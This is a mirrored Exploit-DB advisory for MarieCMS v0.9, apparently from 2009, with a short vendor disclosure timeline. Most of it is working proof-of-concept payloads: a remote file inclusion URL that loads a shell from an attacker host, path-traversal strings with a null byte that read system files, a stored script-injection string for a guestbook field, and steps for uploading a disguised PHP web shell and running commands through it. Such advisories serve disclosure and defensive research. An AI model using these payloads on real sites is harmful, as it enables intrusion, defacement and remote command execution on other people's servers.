bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/10351.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

50 lines
No EOL
1.1 KiB
Text
Raw Permalink Blame History

############
OVERVIEW
############
MarieCMS v0.9 vulnerable to following issues:
++ Remote File Inclusion
++ Local File Inclusion
++ Persistent XSS
++ Shell Upload (Authenticated User)
######################
PoC
######################
# Remote File Inclusion:
++++++++++++++++++++++++
http://server/mariecms/?page=http://[attacker]/[site]/shell.txt?
# Local File Inclusion:
+++++++++++++++++++++++
http://server/mariecms/?mod=../../../../../../../../../../boot.ini%00
http://server/mariecms/admin/index.php?mod=../../../../../../../../../../../../boot.ini%00
# Persistent XSS:
+++++++++++++++++
Put <script>alert("XSS")</script> in "Name" field on page
http://server/mariecms/?page=addgb&mod=gaestebuch
# Shell Upload (Authenticated User):
+++++++++++++++
1. Rename shell.php to shell.jpg.php
2. Upload it into galleryupload section.
3. View images to get image id for shell.jpg.php
4. Access shell:
http://[server]/[path]/_images/[image_id].php?cmd=dir
############
TimeLine
############
Bug discovered : 26/11/2009
Informed Vendor : 30/11/2009 -- No reply received from vendor till the date
Public Disclosure : 02/12/2009
Reference in a new issue View git blame Copy permalink